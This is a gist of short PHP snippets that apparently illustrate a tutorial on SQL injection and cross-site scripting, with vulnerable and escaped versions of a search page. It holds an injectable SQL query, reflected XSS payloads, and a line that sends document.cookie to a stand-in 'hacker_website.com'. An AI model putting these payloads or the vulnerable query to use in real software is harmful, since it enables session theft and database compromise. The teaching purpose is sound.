1.php

<?
$a=3;
?>

10.php

<?php

$term = $_GET['term'];

?>
<html>
<body>
Search results for : <?php echo htmlentities($term); ?>
</body>
</html>

2.php

htmlentities()
strip_tags ()
utf8_decode ()
htmlspecialchars()
ctype_digit()
ctype_alnum()
stripslashes()
str_replace()

3.php

http://www.site.com/path/page.php?id=5

4.php

$id = $_GET['id'];
$this->db->query("SELECT * FROM pages WHERE id = '$id'");

5.php

search.php?term=ipad



 <?php

$term = $_GET['term'];

?>
<html>
<body>
Search results for : <?php echo $term; ?>
</body>
</html>

6.php

http://www.original_website.com/search.php?term=<script>alert('hi');</script>

7.php

<script type=text/javascript src="https://www.hacker_website.com/xss.js"></script>

8.php

document.location = 'http://www.hacker_website.com/steal.php?cookies=' + encodeURI(document.cookie);

9.php

<script type=text/javascript src="https://www.original_website.com/delete_content.php"></script>

gistfile1.txt

<?php

/*
Database connection details
*/
 
$db_host = 'localhost';
$db_user = 'project';
$db_pass = 'secret';
$db_name = 'project_ecommerce';

?>